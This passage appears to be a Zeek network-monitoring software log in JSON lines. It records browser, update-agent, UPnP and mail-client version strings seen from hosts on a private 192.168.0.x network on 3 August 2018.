Safari/537.36"} +{"ts":"2018-08-03T23:37:24.255854Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.249070Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.318662Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.332723Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.339018Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.337469Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:25.218141Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:26.531755Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.531755Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.534184Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.534599Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.534599Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.535645Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.535645Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.537466Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.537466Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.533800Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:26.533800Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.533800Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.537530Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.537530Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.535955Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.535955Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.535955Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.536008Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.536008Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.538155Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.538155Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.538155Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.533699Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.538010Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.538010Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.538565Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.538565Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.537020Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.537020Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.536880Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.536880Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.536782Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.536782Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.534184Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.544600Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.544600Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.535838Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:26.535838Z","host":"192.168.0.1","host_p":8080,"software_type":"HTTP::SERVER","name":"IGD-HTTP","version.major":1,"version.minor":1,"version.addl":"UPNP/1","unparsed_version":"IGD-HTTP/1.1 UPNP/1.0 UPNP-DEVICE-HOST/1.0"} +{"ts":"2018-08-03T23:37:26.962905Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.963074Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.934861Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.963925Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.006720Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.936490Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.976303Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:26.961291Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.009703Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.230095Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.431161Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.499009Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.428334Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.454960Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:27.875957Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:28.253386Z","host":"192.168.0.54","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":2,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/2.0"} +{"ts":"2018-08-03T23:37:33.512973Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.515367Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.662040Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.513129Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.662876Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.531690Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.670428Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.520749Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.666648Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.516323Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.709249Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:33.674701Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:35.284641Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:35.052822Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:35.861056Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.864191Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.862260Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.877452Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.877158Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.877158Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.875220Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.898883Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.929212Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.865949Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.866252Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.885855Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.917136Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.919379Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.898612Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.918807Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.917319Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.872836Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.903162Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.917836Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.865862Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.930675Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.900286Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:35.945836Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.937296Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:35.879812Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:36.041558Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":8,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"} +{"ts":"2018-08-03T23:37:36.039089Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:36.040113Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:36.055627Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:36.042171Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:36.054926Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:36.041745Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:36.041854Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:36.148059Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:36.134727Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:36.175015Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:36.163467Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:37.171811Z","host":"192.168.0.53","software_type":"SMTP::MAIL_CLIENT","name":"Microsoft Outlook Express","version.major":6,"version.minor":0,"version.minor2":2900,"version.minor3":5512,"unparsed_version":"Microsoft Outlook Express 6.00.2900.5512"} 